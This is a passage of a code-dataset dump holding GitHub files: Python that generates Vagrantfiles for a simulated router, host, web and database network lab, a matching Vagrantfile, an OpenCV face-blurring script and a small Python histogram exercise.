+ \"\\\"\\n\")\n\n \n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-1\\\", auto_config: true\\n\") \n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\"Static Routig configuration Started for \" + Name + \"\\\"\\n\")\n f.write(\"sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo route add -net \" + str(IpNet) + \" netmask \" + Netmask + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n for edge in edges:\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n #here there is the custum script\n f.write(CustumScript + 
\" \\n\")\n\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + Ram + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\ndef writeWebServer(f, Web, edges):\n\n Id = Web[\"id\"]\n Name = Web[\"label\"]\n Os = Web[\"vm_image\"]\n Ram = Web[\"ram\"]\n N_Cpus = Web[\"n_cpus\"]\n \n Ip = Web[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Web[\"network_interfaces\"][0][\"netmask\"]\n Interface = Web[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Web[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n CustumScript = Web[\"custom_script\"]\n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n for x in Network:\n Gateway = str(x)\n\n f.write('config.vm.define \\\"' + Name + '\\\" do |' + Name + '|\\n')\n f.write(Name + '.vm.box = \\\"' + Os + '\\\" \\n')\n f.write(Name + '.vm.hostname = \\\"' + Name + '\\\"\\n')\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-2\\\", auto_config: true\\n\") \n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + '.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\\n')\n f.write('echo \"Static Routig configuration Started for ' + Name + '\\\"\\n')\n f.write('sudo sysctl -w net.ipv4.ip_forward=1\\n')\n f.write(\"sudo route add -net \" + str(IpNet) + \" netmask \" + Netmask + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n\n f.write('echo \"Configuration END\"\\n')\n f.write('#echo ' + Name + ' is ready to Use\"\\n')\n f.write('SHELL\\n')\n f.write('web1.vm.provision \"docker\" do |doc|\\n')\n f.write('doc.pull_images \"nginx\"\\n')\n f.write('doc.pull_images \"php\"\\n')\n f.write('doc.run \"nginx\"\\n')\n f.write('doc.run \"php\"\\n')\n f.write('end\\n')\n f.write(Name + '.vm.provider \"virtualbox\" do |vb|\\n')\n f.write(\"vb.memory = \" + Ram + \"\\n\")\n f.write('end\\n')\n f.write('end\\n')\n\ndef writeDatabase(f, Db, edges):\n # Configure database server machine\n Id = Db[\"id\"]\n Name = Db[\"label\"]\n Os = Db[\"vm_image\"]\n Ram = Db[\"ram\"]\n N_Cpus = Db[\"n_cpus\"]\n\n Ip = Db[\"network_interfaces\"][0][\"ip_address\"]\n Netmask = Db[\"network_interfaces\"][0][\"netmask\"]\n Interface = 
Db[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference = Db[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth = 0\n DownlinkBandwidth = 0\n for edge in edges:\n if EdgeReference[0] == edge[\"from\"] and EdgeReference[1] == edge[\"to\"]:\n UplinkBandwidth = edge[\"bandwidth_up\"]\n DownlinkBandwidth = edge[\"bandwidth_down\"]\n CustumScript = Db[\"custom_script\"]\n IpNoSub = Ip.split(\"/\")[0]\n Network = ipcalc.Network(Ip)\n IpNet = Network.network()\n for x in Network:\n Gateway = str(x)\n\n f.write('config.vm.define \\\"' + Name + '\\\" do |' + Name + '|\\n')\n f.write(Name + '.vm.box = \\\"' + Os + '\\\" \\n')\n f.write(Name + '.vm.hostname = \\\"' + Name + '\\\" \\n')\n f.write(Name + \".vm.network \\\"private_network\\\", ip: \\\"\" + IpNoSub +\"\\\", netmask: \\\"\" + Netmask + \"\\\", virtualbox__intnet: \\\"broadcast_router-south-3\\\", auto_config: true\\n\") \n f.write(Name + '.vm.provision \"file\", source: \\\"../Dashboard_Server/telegraf.conf\\\", destination: \\\"/tmp/telegraf.conf\\\"\\n')\n f.write(Name + '.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\\n')\n f.write('echo \"Static Routig configuration Started for db-1\"\\n')\n f.write('sudo sysctl -w net.ipv4.ip_forward=1\\n')\n f.write(\"sudo route add -net \" + str(IpNet) + \" netmask \" + Netmask + \" gw \" + Gateway + \" dev \" + Interface + \"\\n\")\n f.write('cd /home/vagrant\\n')\n f.write('git clone https://github.com/magnific0/wondershaper.git\\n')\n f.write('cd wondershaper\\n')\n if UplinkBandwidth > 0 or DownlinkBandwidth > 0:\n f.write('sudo ./wondershaper -a ' + Interface)\n if DownlinkBandwidth > 0:\n f.write(' -d ' + str(DownlinkBandwidth))\n if UplinkBandwidth > 0:\n f.write(' -u ' + str(UplinkBandwidth))\n f.write('\\n')\n\n f.write('wget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo dpkg -i telegraf_1.17.3-1_amd64.deb\\n')\n f.write('sudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\\n')\n f.write('sudo systemctl restart telegraf\\n')\n f.write('sudo systemctl enable telegraf\\n')\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n\n f.write('echo \"Configuration END\"\\n')\n f.write('#echo \"Host--B is ready to Use\"\t\\n')\n f.write('SHELL\\n')\n f.write(Name + '.vm.provision \"docker\" do |doc|\\n')\n f.write('doc.pull_images \"mysql\"\\n')\n f.write('doc.run \"mysql\"\\n')\n f.write('end\\n')\n f.write(Name + '.vm.provider \"virtualbox\" do |vb|\\n')\n f.write('vb.memory = ' + str(Ram) +'\\n')\n f.write('vb.cpus = ' + str(N_Cpus) + '\\n')\n f.write('end\\n')\n f.write('end\\n')\n\n\n\n#this function write in the vagrant file a new Router\ndef writeRouter(f, Router, edges):\n\n # print(\"adding a router to the vagrant file\") \n\n #extrapolate each attribute from the touples\n Id = Router[\"id\"]\n Name = Router[\"label\"]\n Os = Router[\"vm_image\"]\n Ram = Router[\"ram\"]\n N_Cpus = Router[\"n_cpus\"]\n\n Ip1 = Router[\"network_interfaces\"][0][\"ip_address\"]\n Netmask1 = Router[\"network_interfaces\"][0][\"netmask\"]\n Interface1 = Router[\"network_interfaces\"][0][\"name_interface\"]\n EdgeReference1 = Router[\"network_interfaces\"][0][\"edge\"]\n UplinkBandwidth1 = 0\n DownlinkBandwidth1 = 0\n for edge in edges:\n if EdgeReference1[0] == edge[\"from\"] and EdgeReference1[1] == edge[\"to\"]:\n UplinkBandwidth1 = edge[\"bandwidth_up\"]\n DownlinkBandwidth1 = edge[\"bandwidth_down\"]\n IpNoSub1 = Ip1.split(\"/\")[0]\n NetmaskAbbr1 = Ip1.split(\"/\")[1]\n\n Ip2 = 
Router[\"network_interfaces\"][1][\"ip_address\"]\n Netmask2 = Router[\"network_interfaces\"][1][\"netmask\"]\n Interface2 = Router[\"network_interfaces\"][1][\"name_interface\"]\n EdgeReference2 = Router[\"network_interfaces\"][1][\"edge\"]\n UplinkBandwidth2 = 0\n DownlinkBandwidth2 = 0\n for edge in edges:\n if EdgeReference2[0] == edge[\"from\"] and EdgeReference2[1] == edge[\"to\"]:\n UplinkBandwidth2 = edge[\"bandwidth_up\"]\n DownlinkBandwidth2 = edge[\"bandwidth_down\"]\n IpNoSub2 = Ip2.split(\"/\")[0]\n NetmaskAbbr2 = Ip2.split(\"/\")[1]\n\n Ip3 = Router[\"network_interfaces\"][2][\"ip_address\"]\n Netmask3 = Router[\"network_interfaces\"][2][\"netmask\"]\n Interface3 = Router[\"network_interfaces\"][2][\"name_interface\"]\n EdgeReference3 = Router[\"network_interfaces\"][2][\"edge\"]\n UplinkBandwidth3 = 0\n DownlinkBandwidth3 = 0\n for edge in edges:\n if EdgeReference3[0] == edge[\"from\"] and EdgeReference3[1] == edge[\"to\"]:\n UplinkBandwidth3 = edge[\"bandwidth_up\"]\n DownlinkBandwidth3 = edge[\"bandwidth_down\"]\n IpNoSub3 = Ip3.split(\"/\")[0]\n NetmaskAbbr3 = Ip3.split(\"/\")[1]\n \n Network1 = ipcalc.Network(Ip1)\n IpNet1 = Network1.network()\n for x in Network1:\n Gateway1 = str(x)\n\n Network2 = ipcalc.Network(Ip2)\n IpNet2 = Network2.network()\n for x in Network2:\n Gateway2 = str(x)\n\n Network3 = ipcalc.Network(Ip3)\n IpNet3 = Network3.network()\n for x in Network3:\n Gateway3 = str(x) \n\n CustumScript = Router[\"custom_script\"]\n\n\n f.write(\"config.vm.define \\\"\"+ Name +\"\\\" do |\" + Name + \"|\\n\")\n f.write(Name + \".vm.box = \\\"\" + Os + \"\\\"\\n\")\n f.write(Name + \".vm.hostname = \\\"\"+ Name +\"\\\"\\n\")\n f.write(Name + '.vm.network \"private_network\", ip: \\\"' + IpNoSub1 + '\\\", netmask: \\\"' + Netmask1 + '\\\", virtualbox__intnet: \"broadcast_router-south-1\", auto_config: true\\n')\n f.write(Name + '.vm.network \"private_network\", ip: \\\"' + IpNoSub2 + '\\\", netmask: \\\"' + Netmask2 + '\\\", virtualbox__intnet: \"broadcast_router-south-2\", auto_config: true\\n')\n f.write(Name + '.vm.network \"private_network\", ip: \\\"' + IpNoSub3 + '\\\", netmask: \\\"' + Netmask3 + '\\\", virtualbox__intnet: \"broadcast_router-south-3\", auto_config: true\\n')\n f.write(Name + \".vm.provision \\\"shell\\\", run: \\\"always\\\", inline: <<-SHELL\\n\")\n f.write(\"echo \\\" Quagga \"+ Name +\" start installing\\\"\\n\")\n f.write(\"#sudo sysctl -w net.ipv4.ip_forward=1\\n\")\n f.write(\"sudo apt-get update\\n\")\n f.write(\"sudo apt-get install quagga quagga-doc traceroute\\n\")\n f.write(\"sudo cp /usr/share/doc/quagga/examples/zebra.conf.sample /etc/quagga/zebra.conf\\n\")\n f.write(\"sudo cp /usr/share/doc/quagga/examples/ospfd.conf.sample /etc/quagga/ospfd.conf\\n\")\n f.write(\"sudo chown quagga.quaggavty /etc/quagga/*.conf\\n\")\n f.write(\"sudo /etc/init.d/quagga start\\n\")\n f.write(\"sudo sed -i s'/zebra=no/zebra=yes/' /etc/quagga/daemons\\n\")\n f.write(\"sudo sed -i s'/ospfd=no/ospfd=yes/' /etc/quagga/daemons\\n\")\n f.write(\"sudo echo 'VTYSH_PAGER=more' >>/etc/environment\\n\")\n f.write(\"sudo echo 'export VTYSH_PAGER=more' >>/etc/bash.bashrc\\n\")\n f.write(\"sudo /etc/init.d/quagga restart\\n\")\n f.write(\"echo \\\"Routing Protocol ospf Configuration Started\\\"\\n\")\n f.write(\"sudo vtysh -c '\\n\")\n f.write(\"configure terminal\\n\")\n f.write(\"router ospf\\n\")\n f.write(\"network \" + str(IpNet1) + \"/\" + NetmaskAbbr1 + \" area 0.0.0.0\\n\")\n f.write(\"interface \" + Interface1 + \"\\n\")\n f.write(\"ip address \" + 
IpNoSub1 + \"/\" + NetmaskAbbr1 + \"\\n\")\n f.write(\"exit\\n\")\n f.write(\"interface \" + Interface2 + \"\\n\")\n f.write(\"ip address \" + IpNoSub2 + \"/\" + NetmaskAbbr2 + \"\\n\")\n f.write(\"exit\\n\")\n f.write(\"interface \" + Interface3 + \"\\n\")\n f.write(\"ip address \" + IpNoSub3 + \"/\" + NetmaskAbbr3 + \"\\n\")\n f.write(\"do write\\n\")\n f.write(\"exit\\n\")\n f.write(\"exit\\n\")\n f.write(\"ip forwarding\\n\")\n f.write(\"exit'\\n\")\n\n if UplinkBandwidth1 > 0 or DownlinkBandwidth1 > 0:\n f.write('sudo ./wondershaper -a ' + Interface1)\n if DownlinkBandwidth1 > 0:\n f.write(' -d ' + str(DownlinkBandwidth1))\n if UplinkBandwidth1 > 0:\n f.write(' -u ' + str(UplinkBandwidth1))\n f.write('\\n')\n\n if UplinkBandwidth2 > 0 or DownlinkBandwidth2 > 0:\n f.write('sudo ./wondershaper -a ' + Interface2)\n if DownlinkBandwidth2 > 0:\n f.write(' -d ' + str(DownlinkBandwidth2))\n if UplinkBandwidth2 > 0:\n f.write(' -u ' + str(UplinkBandwidth2))\n f.write('\\n')\n \n if UplinkBandwidth3 > 0 or DownlinkBandwidth3 > 0:\n f.write('sudo ./wondershaper -a ' + Interface3)\n if DownlinkBandwidth3 > 0:\n f.write(' -d ' + str(DownlinkBandwidth3))\n if UplinkBandwidth3 > 0:\n f.write(' -u ' + str(UplinkBandwidth3))\n f.write('\\n')\n #here there is the custum script\n f.write(CustumScript + \" \\n\")\n\n f.write(\"echo \\\"Configuration END\\\"\\n\")\n f.write(\"echo \\\"\" + Name + \" is ready to Use\\\"\\n\")\n f.write(\"SHELL\\n\")\n f.write(Name + \".vm.provider \\\"virtualbox\\\" do |vb|\\n\")\n f.write(\"vb.memory = \" + str(Ram) + \"\\n\")\n f.write('vb.cpus =' + str(N_Cpus) + \"\\n\")\n f.write(\"end\\n\")\n f.write(\"end\\n\")\n\n\n\"\"\"\n#the following is a fake graph that i used for testing\n#instead of typing everytime the input in the command line\nhost1 = (1,{\n \"Id\" : 1,\n \"Name\":\"host1\",\n \"Type\": \"Host\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.10.10/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\nrout1 = (2,{\n \"Id\" : 2,\n \"Name\":\"router1\",\n \"Type\": \"Router\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.10.2/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n },{\n \"Ip\": \"192.168.10.3/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth2\"\n },{\n \"Ip\": \"192.168.10.4/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth3\"\n }]\n})\n\nweb1 = (3,{\n \"Id\" : 3,\n \"Name\":\"web1\",\n \"Type\": \"Web\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.10.11/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\ndb1 = (4,{\n \"Id\" : 4,\n \"Name\":\"db1\",\n \"Type\": \"Db\",\n \"Ram\": \"1024\",\n \"Os\": \"bento/ubuntu-16.04\",\n \"custom_script\":\"echo 'THIS IS CUSTUM SCRIPT'\",\n \"Network\" : [{\n \"Ip\": \"192.168.10.12/24\",\n \"Netmask\": \"255.255.255.0\",\n \"Interface\" : \"eth1\"\n }]\n})\n\nMyNet = [host1,rout1,web1,db1]\n\ndef find_between( s, first, last ):\n try:\n start = s.index( first ) + len( first )\n end = s.index( last, start )\n return s[start:end]\n except ValueError:\n return \"\"\n\ndef remap(newList):\n print(\"-------------------\")\n\n for item in newList:\n print(\"Looking at device \" + str(item))\n print(\"the TYPE is \" 
+ item[\"type\"])\n if item[\"type\"] == \"router\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n device[1][\"Network\"][1][\"Ip\"] = item[\"network_interfaces\"][1][\"ip_address\"]\n device[1][\"Network\"][1][\"Netmask\"] = item[\"network_interfaces\"][1][\"netmask\"]\n device[1][\"Network\"][1][\"Interface\"] = item[\"network_interfaces\"][1][\"name_interface\"]\n\n device[1][\"Network\"][2][\"Ip\"] = item[\"network_interfaces\"][2][\"ip_address\"]\n device[1][\"Network\"][2][\"Netmask\"] = item[\"network_interfaces\"][2][\"netmask\"]\n device[1][\"Network\"][2][\"Interface\"] = item[\"network_interfaces\"][2][\"name_interface\"] \n\n for item in newList:\n if item[\"type\"] == \"host\" : \n\n for device in MyNet:\n if device[1][\"Id\"] is item[\"id\"]:\n print(\"remap of device \" + str(device[1][\"Id\"]) + \" to device \" + str(item[\"id\"]))\n device[1][\"Name\"] = item[\"label\"]\n device[1][\"Ram\"] = item[\"ram\"]\n device[1][\"Os\"] = item[\"vm_image\"]\n\n device[1][\"Network\"][0][\"Ip\"] = item[\"network_interfaces\"][0][\"ip_address\"]\n device[1][\"Network\"][0][\"Netmask\"] = item[\"network_interfaces\"][0][\"netmask\"]\n device[1][\"Network\"][0][\"Interface\"] = item[\"network_interfaces\"][0][\"name_interface\"]\n\n return MyNet\n\"\"\"\n\ndef html_to_vagrantfile(nodes, edges):\n VagrantFile = open(\"Vagrantfile\", \"w\")\n\n #read the data structure from input\n #Network = G.nodes.data():\n #file = codecs.open(\"NetworkGraphs/Template/OSPF_Routing_Template.html\", \"r\", \"utf-8\")\n #html = file.read()\n\n #if \"nodes = new vis.DataSet(\" in html:\n # listOfDevice = find_between(html, \"nodes = new vis.DataSet(\" , \")\")\n # print(listOfDevice)\n # listOfDevice = yaml.load(listOfDevice) \n\n #newNet = remap(listOfDevice)\n #N.B per Luca, Network è già la lista dei nodi che puoi esplorare\n #Network = MyNet #DA SOSTITUIRE CON \"NEW NET\" ALLA FINE\n\n BeginVagrantFile(VagrantFile)\n\n for node in nodes: \n if node[\"type\"] == \"router\":\n writeRouter(VagrantFile, node, edges)\n if node[\"type\"] == \"host\":\n writeHost(VagrantFile, node, edges)\n if node[\"type\"] == \"Web\":\n writeWebServer(VagrantFile, node, edges)\n if node[\"type\"] == \"Db\":\n writeDatabase(VagrantFile, node, edges)\n VagrantFile.write(\"end\\n\")\n VagrantFile.close()\n"
},
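The writeHost/writeWebServer/writeDatabase/writeRouter helpers above all derive the gateway by iterating over every address ipcalc yields for the subnet and keeping the last one, which the file's own comment admits is a trivial approach. A sketch of a more direct derivation using the standard-library ipaddress module (shown as an alternative, not what this repository uses):

import ipaddress

iface = ipaddress.ip_interface("192.168.10.10/24")  # ip address plus prefix in one value
network = iface.network                             # 192.168.10.0/24
gateway = network.broadcast_address - 1             # 192.168.10.254, no iteration needed
print(str(network.network_address), str(gateway))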
{
"alpha_fraction": 0.7089970111846924,
"alphanum_fraction": 0.7559190988540649,
"avg_line_length": 35.873016357421875,
"blob_id": "edf8c97bc40a575b87ca7975ab57b70090b79380",
"content_id": "fad86b940113d98a24d3167f4b51b9912e9d7ee0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 2323,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 63,
"path": "/NetworkGraphs/Presentation/Vagrantfile",
"repo_name": "SuperboGiuseppe/dncs_lab2",
"src_encoding": "UTF-8",
"text": "# webserver and a host you can access the webserver from your browser with ip address 10.0.0.50 or from the host \n# -*- mode: ruby -*-\n# vi: set ft=ruby :\nVagrant.configure(\"2\") do |config|\n# Configure web server machine\nconfig.vm.define \"web2\" do |web2|\nweb2.vm.box = \"bento/ubuntu-16.04\"\nweb2.vm.hostname = \"web2\"\nweb2.vm.network \"private_network\", ip: \"10.0.0.51/24\" \nweb2.vm.provision \"file\", source: \"../Dashboard_Server/telegraf.conf\", destination: \"/tmp/telegraf.conf\"\nweb2.vm.provision \"shell\", inline: <<-SHELL \necho \"Starting Provision: web server\"\nsudo apt-get update\nsudo apt-get install -y nginx\ntouch /var/www/html/index.php\nsudo apt-get install -y php-fpm php-mysql\ncd /home/vagrant\ngit clone https://github.com/magnific0/wondershaper.git\ncd wondershaper\nsudo ./wondershaper -a eth1 -d 1000 -u 1000\nwget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\nsudo dpkg -i telegraf_1.17.3-1_amd64.deb\nsudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\nsudo systemctl restart telegraf\nsudo systemctl enable telegraf\nsudo apt install -y htop \necho \"Provision web server complete\"\nSHELL\nweb2.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nvb.cpus = 2\nend\nend\n# Configure database server machine\nconfig.vm.define \"db2\" do |db2|\ndb2.vm.box = \"bento/ubuntu-16.04\"\ndb2.vm.hostname = \"db2\"\ndb2.vm.network \"private_network\", ip: \"10.0.0.52/24\" \ndb2.vm.provision \"file\", source: \"../Dashboard_Server/telegraf.conf\", destination: \"/tmp/telegraf.conf\"\ndb2.vm.provision \"shell\", run: \"always\", inline: <<-SHELL\nsudo apt update\nsudo DEBIAN_FRONTEND=noninteractive apt-get -q -y install mysql-server\necho \"WARNING: It is necessary to set the root password of mysql-server before using it!!!\"\necho \"Example password configuration: mysqladmin -u root password mysecretpasswordgoeshere\"\nsleep 10\ncd /home/vagrant\ngit clone https://github.com/magnific0/wondershaper.git\ncd wondershaper\nsudo ./wondershaper -a eth1 -d 1000 -u 1000\nwget https://dl.influxdata.com/telegraf/releases/telegraf_1.17.3-1_amd64.deb\nsudo dpkg -i telegraf_1.17.3-1_amd64.deb\nsudo mv /tmp/telegraf.conf /etc/telegraf/telegraf.conf\nsudo systemctl restart telegraf\nsudo systemctl enable telegraf\nsudo apt install -y htop \necho \"Provision database server complete\"\nSHELL\ndb2.vm.provider \"virtualbox\" do |vb|\nvb.memory = 1024\nvb.cpus = 2\nend\nend\nend\n"
}
] | 24 |
Nazlaamelia/Face-Detection-And-Blurring | https://github.com/Nazlaamelia/Face-Detection-And-Blurring | 5e835d9722839b8e68614330c730aa4c4c5f9323 | b4227f1f5509179ee4704cea44e7f430dd49dfb5 | 363f7a375d57c036ffa90d21b0d155929d620429 | refs/heads/main | 2023-02-15T13:58:31.556717 | 2021-01-14T09:49:33 | 2021-01-14T09:49:33 | 329,561,221 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.560669481754303,
"alphanum_fraction": 0.6066945791244507,
"avg_line_length": 24.33333396911621,
"blob_id": "fac274bca5b76dd7a0913a0bd27f15ee5ebeefe0",
"content_id": "e7c9b74ada3cc6d91c0d4c1d79dfb05041b676ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 478,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 18,
"path": "/BlurWajah.py",
"repo_name": "Nazlaamelia/Face-Detection-And-Blurring",
"src_encoding": "UTF-8",
"text": "import cv2\r\nimport numpy as np\r\n\r\nface_cascade = cv2.CascadeClassifier(\"face_detector.xml\")\r\n\r\nimg = cv2.imread(\"rame.jpeg\")\r\n\r\ndetections = face_cascade.detectMultiScale(img, scaleFactor=1.1, minNeighbors=6)\r\n\r\nfor face in detections :\r\n x,y,w,h = face \r\n \r\n img[y:y+h,x:x+w] = cv2.GaussianBlur(img[y:y+h,x:x+w],(15,15),cv2.BORDER_DEFAULT)\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2)\r\n\r\n cv2.imshow(\"Hasil Blur Wajah\", img)\r\n\r\ncv2.waitKey(0)\r\n\r\n\r\n"
}
] | 1 |
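BlurWajah.py in the row above shows the core region-of-interest pattern: detect faces, then overwrite each img[y:y+h, x:x+w] slice with its Gaussian-blurred copy. The same loop generalizes to live video; a hypothetical webcam variant (camera index and exit key are assumptions, not part of the repository):

import cv2

face_cascade = cv2.CascadeClassifier("face_detector.xml")  # same cascade file as above
cap = cv2.VideoCapture(0)
while True:
    ok, frame = cap.read()
    if not ok:
        break
    for (x, y, w, h) in face_cascade.detectMultiScale(frame, scaleFactor=1.1, minNeighbors=6):
        # blur only the detected face region, in place
        frame[y:y+h, x:x+w] = cv2.GaussianBlur(frame[y:y+h, x:x+w], (15, 15), cv2.BORDER_DEFAULT)
    cv2.imshow("Hasil Blur Wajah", frame)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
cap.release()
cv2.destroyAllWindows()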
varsh2506/PythonAssignment | https://github.com/varsh2506/PythonAssignment | 23c08e6afd552d9d7726654e981d7201a16a5d4b | 7ae2964d51af6a489ec05917e85624a2459a47ca | dc5d226de816b83bb05232ba8dc7000bea339847 | refs/heads/master | 2021-01-20T16:38:27.235859 | 2017-05-16T09:50:05 | 2017-05-16T09:50:05 | 90,830,351 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8666666746139526,
"alphanum_fraction": 0.8666666746139526,
"avg_line_length": 21.5,
"blob_id": "5beefe3d1b4a78d9a6faebe8f10061c52e311a1d",
"content_id": "8c0f3bcafa1cb4c7ff52876c8baa3199798c3605",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 45,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 2,
"path": "/README.md",
"repo_name": "varsh2506/PythonAssignment",
"src_encoding": "UTF-8",
"text": "# PythonAssignment\nExperimenting with Python\n"
},
{
"alpha_fraction": 0.5768863558769226,
"alphanum_fraction": 0.6055396199226379,
"avg_line_length": 29.058822631835938,
"blob_id": "b4c5c16b4140b934292c57a9b8c33770d6cc4b54",
"content_id": "63f915bc2d98c7b973be6eeec9258cae0dfc3792",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1047,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 34,
"path": "/Assignment2.py",
"repo_name": "varsh2506/PythonAssignment",
"src_encoding": "UTF-8",
"text": "'''This code displays the histogram for a given data set according the user's choice of class size.\nFirst, the hist_data list is updated with each of its elements being a list of elements in a particular class interval.\nThe histogram is then displayed using the hist_data list.'''\n\ndata = [3, 4, 3, 4, 5, 6, 2, 1, 5, 4, 6, 7, 8, 9, 10, 1, 20, 6, 8, 9]\nhist_data = [] #Stores the values in each range as a list of lists\nbin_size = int(raw_input(\"Enter width of each interval: \"))\nl = min(data)\nu = bin_size+l-1\nct = 0 \ndata.sort()\n\nil = [] #Inner list which contains the values in a specific range\nwhile ct<len(data): \n if data[ct]>=l and data[ct]<=u:\n il.append(data[ct])\n ct+=1\n else:\n l=u+1\n u=l+bin_size-1\n hist_data.append(il)\n il = []\n if ct==len(data):\n hist_data.append(il)\n\nl = min(data)\nu = bin_size+l-1\n\n#Printing the histogram using the hist_data list\nfor j in hist_data:\n print str(l)+'-'+str(u),\n print '-'*len(j)\n l=u+1\n u=bin_size+l-1\n\n \n \n \n \n"
}
] | 2 |
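The interval-walking loop in Assignment2.py above can also be expressed by mapping each value straight to a bin index, which removes the manual lower/upper bound bookkeeping. A Python 3 sketch of the same histogram (same data, same output shape; not part of the repository):

from collections import Counter

data = [3, 4, 3, 4, 5, 6, 2, 1, 5, 4, 6, 7, 8, 9, 10, 1, 20, 6, 8, 9]
bin_size = 5
lo = min(data)
counts = Counter((value - lo) // bin_size for value in data)  # bin index per value
for index in range(max(counts) + 1):
    start = lo + index * bin_size
    print(str(start) + '-' + str(start + bin_size - 1), '-' * counts.get(index, 0))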
